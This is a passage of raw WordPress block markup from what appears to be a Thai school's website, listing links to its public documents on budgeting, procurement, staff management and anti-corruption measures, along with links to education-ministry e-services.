argin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ce46760f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"ce7ab3f8\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-ce7ab3f8 gb-headline-text\">https://youtu.be/i-C4sNY7Mf8?si=ZGpzxW-nuRPeo7Mi</h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%8